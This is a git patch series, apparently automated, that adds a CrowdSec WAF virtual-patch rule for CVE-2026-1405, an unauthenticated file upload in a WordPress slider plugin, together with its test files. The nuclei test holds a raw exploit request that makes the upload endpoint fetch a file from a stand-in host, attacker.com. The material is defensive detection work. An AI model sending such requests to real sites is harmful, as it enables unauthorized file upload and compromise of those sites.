From 4c16f6ba95e865a843567754b6ad981efa9daf25 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Apr 2026 15:14:56 +0200 Subject: [PATCH 1/4] Add vpatch-CVE-2026-1405 rule --- .../crowdsecurity/vpatch-CVE-2026-1405.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml new file mode 100644 index 00000000000..561b2233273 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml @@ -0,0 +1,34 @@ +## autogenerated on 2026-04-01 13:14:53 +name: crowdsecurity/vpatch-CVE-2026-1405 +description: 'Detects unauthenticated arbitrary file upload in WordPress Slider Future plugin <= 1.0.5 via /wp-json/slider-future/v1/upload-image/' +rules: + - and: + - zones: + - URI + transform: + - lowercase + match: + type: contains + value: /wp-json/slider-future/v1/upload-image/ + - zones: + - BODY_ARGS + variables: + - json.image_url + transform: + - lowercase + - urldecode + match: + type: contains + value: http + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'WordPress Slider Future - File Upload' + classification: + - cve.CVE-2026-1405 + - attack.T1190 + - cwe.CWE-434 From 325e901552de3d98355bd49430f421cf3e085fdf Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Apr 2026 15:14:58 +0200 Subject: [PATCH 2/4] Add vpatch-CVE-2026-1405 test config --- .appsec-tests/vpatch-CVE-2026-1405/config.yaml | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2026-1405/config.yaml diff --git a/.appsec-tests/vpatch-CVE-2026-1405/config.yaml b/.appsec-tests/vpatch-CVE-2026-1405/config.yaml new file mode 100644 index 00000000000..e0a477f8029 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2026-1405/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2026-04-01 13:14:53 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml +nuclei_template: CVE-2026-1405.yaml From 2534c5d0d881dde1f015dc45d5ff86785ff5af70 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Apr 2026 15:15:00 +0200 Subject: [PATCH 3/4] Add CVE-2026-1405.yaml test --- .../vpatch-CVE-2026-1405/CVE-2026-1405.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2026-1405/CVE-2026-1405.yaml diff --git a/.appsec-tests/vpatch-CVE-2026-1405/CVE-2026-1405.yaml b/.appsec-tests/vpatch-CVE-2026-1405/CVE-2026-1405.yaml new file mode 100644 index 00000000000..5082e7454d8 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2026-1405/CVE-2026-1405.yaml @@ -0,0 +1,21 @@ +## autogenerated on 2026-04-01 13:14:53 +id: CVE-2026-1405 +info: + name: CVE-2026-1405 + author: crowdsec + severity: info + description: CVE-2026-1405 testing + tags: appsec-testing +http: + - raw: + - | + POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"image_url":"http://attacker.com/evil.jpg"} + cookie-reuse: true + matchers: + - type: status + status: + - 403 From 2a4ab094ed70e8a8193021bd2af3f78363baabeb Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 1 Apr 2026 15:15:02 +0200 Subject: [PATCH 4/4] Add vpatch-CVE-2026-1405 rule to vpatch collection --- collections/crowdsecurity/appsec-virtual-patching.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index 769bab174d9..3ddff1b2f24 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -116,6 +116,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2025-49113 - crowdsecurity/appsec-generic-test - crowdsecurity/vpatch-CVE-2025-25257 +- crowdsecurity/vpatch-CVE-2026-1405 - crowdsecurity/vpatch-CVE-2019-5418 - crowdsecurity/vpatch-CVE-2025-52488 - crowdsecurity/vpatch-CVE-2025-49132